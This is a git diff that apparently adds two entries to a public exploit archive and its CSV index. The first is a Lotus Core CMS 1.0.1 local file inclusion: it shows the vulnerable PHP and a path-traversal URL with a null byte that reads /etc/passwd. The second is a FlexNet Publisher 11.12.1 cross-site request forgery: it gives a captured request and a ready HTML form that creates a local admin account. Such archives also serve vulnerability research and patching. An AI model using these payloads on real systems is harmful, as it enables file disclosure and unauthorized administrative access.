diff --git a/exploits/php/webapps/47985.txt b/exploits/php/webapps/47985.txt
new file mode 100644
index 000000000..51c293070
--- /dev/null
+++ b/exploits/php/webapps/47985.txt
@@ -0,0 +1,33 @@
+# Exploit Title: Lotus Core CMS 1.0.1 - Local File Inclusion
+# Google Dork: N/A
+# Date: 2020-01-31
+# Exploit Author: Daniel Monzón (stark0de)
+# Vendor Homepage: http://lotuscore.sourceforge.net/
+# Software Link: https://sourceforge.net/projects/lotuscore/files/latest/download
+# Version: 1.0.1
+# Tested on: Windows 7 x86
+# CVE : N/A
+
+
+The vulnerability occurs on line 65 of the index.php file, first we can provide the page_slug parameter,
+if it's not set by the user it is set to index, but if the user sets the parameter via a GET or POST request,
+it checks if the file exists and if it exists, it performs an unsanitized inclusion.
+
+-----------------------------------------------------------------------------
+
+if(!$_REQUEST['page_slug']){
+	$_REQUEST['page_slug'] = 'index';
+}
+if(file_exists('system/plugins/'.$_REQUEST['page_slug'].'.php') == true){
+	include('system/plugins/'.$_REQUEST['page_slug'].'.php');
+}else{
+	include("system/plugins/error/404.php");
+}
+
+------------------------------------------------------------------------------
+
+
+The PHP file appends .php to anything we provide as page_slug parameter so to include any file we must use a nullbyte.
+Note that you need to be authenticated to exploit this. The explotation would be like this:
+
+http://site:80/index.php?page_slug=../../../../../etc/passwd%00
\ No newline at end of file
diff --git a/exploits/php/webapps/47986.txt b/exploits/php/webapps/47986.txt
new file mode 100644
index 000000000..82cd88c9a
--- /dev/null
+++ b/exploits/php/webapps/47986.txt
@@ -0,0 +1,63 @@
+# Exploit Title: FlexNet Publisher 11.12.1 - Cross-Site Request Forgery (Add Local Admin)
+# Date: 2019-12-29 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.flexerasoftware.com/
+# Software : FlexNet Publisher
+# Product Version:  v11.12.1
+# Product : https://www.flexerasoftware.com/monetize/products/flexnet-licensing.html
+# Product Version : https://helpnet.flexerasoftware.com/eol/flexnet-publisher.htm 
+# Vulernability Type : Cross-Site Request Forgery (Add Local Admin)
+# Vulenrability : Cross-Site Request Forgery
+# Reference : https://community.flexera.com/t5/FlexNet-Publisher-Knowledge-Base/CVE-2019-8962-remediated-in-FlexNet-Publisher/ta-p/131062
+# CVE : N/A
+
+HTTP Request :
+
+POST /users HTTP/1.1
+Host: SERVER:8888
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://SERVER:8888/users?event=create&licenseTab=
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 197
+Connection: close
+Cookie: Webstation-Locale=en-US; sess_lmgrd=32CFC53815147D5362ACAAF100000001; GUEST=1; UID=GUEST; FL=1; FA=1; DM=; user_type_lmgrd=0
+Upgrade-Insecure-Requests: 1
+
+licenseTab=&selected=&userType=local-admin&userName=ISMAILTASDELEN&firstName=Ismail&lastName=Tasdelen&password2=Test12345&confirm=Test12345&accountType=admin&checksum=1d00c20815e84c31&Create=Create
+
+HTTP Response :
+
+HTTP/1.1 200 OK
+Date: Sun, 29 Dec 2019 08:38:14 GMT
+Server: Apache
+X-Frame-Options: SAMEORIGIN
+Cache-Control: no-cache, no-store
+Connection: close
+Content-Type: text/html; charset=UTF-8
+Content-Length: 14434
+
+CSRF HTML PoC :
+
+<html>
+  <!-- CSRF PoC - generated by Burp Suite Professional -->
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://SERVER:8888/users" method="POST">
+      <input type="hidden" name="licenseTab" value="" />
+      <input type="hidden" name="selected" value="" />
+      <input type="hidden" name="userType" value="local&#45;admin" />
+      <input type="hidden" name="userName" value="ISMAILTASDELEN" />
+      <input type="hidden" name="firstName" value="Ismail" />
+      <input type="hidden" name="lastName" value="Tasdelen" />
+      <input type="hidden" name="password2" value="Test12345" />
+      <input type="hidden" name="confirm" value="Test12345" />
+      <input type="hidden" name="accountType" value="admin" />
+      <input type="hidden" name="checksum" value="1d00c20815e84c31" />
+      <input type="hidden" name="Create" value="Create" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 6c937cdda..b35682ef9 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -42280,3 +42280,5 @@ id,file,description,date,author,type,platform,port
 47978,exploits/php/webapps/47978.txt,"Centreon 19.10.5 - 'centreontrapd' Remote Command Execution",2020-01-29,"Fabien AUNAY",webapps,php,
 47979,exploits/hardware/webapps/47979.txt,"Fifthplay S.A.M.I 2019.2_HP - Persistent Cross-Site Scripting",2020-01-29,LiquidWorm,webapps,hardware,
 47982,exploits/php/webapps/47982.py,"rConfig 3.9.3 - Authenticated Remote Code Execution",2020-01-30,vikingfr,webapps,php,
+47985,exploits/php/webapps/47985.txt,"Lotus Core CMS 1.0.1 - Local File Inclusion",2020-01-31,"Daniel Monzón",webapps,php,
+47986,exploits/php/webapps/47986.txt,"FlexNet Publisher 11.12.1 - Cross-Site Request Forgery (Add Local Admin)",2020-01-31,"Ismail Tasdelen",webapps,php,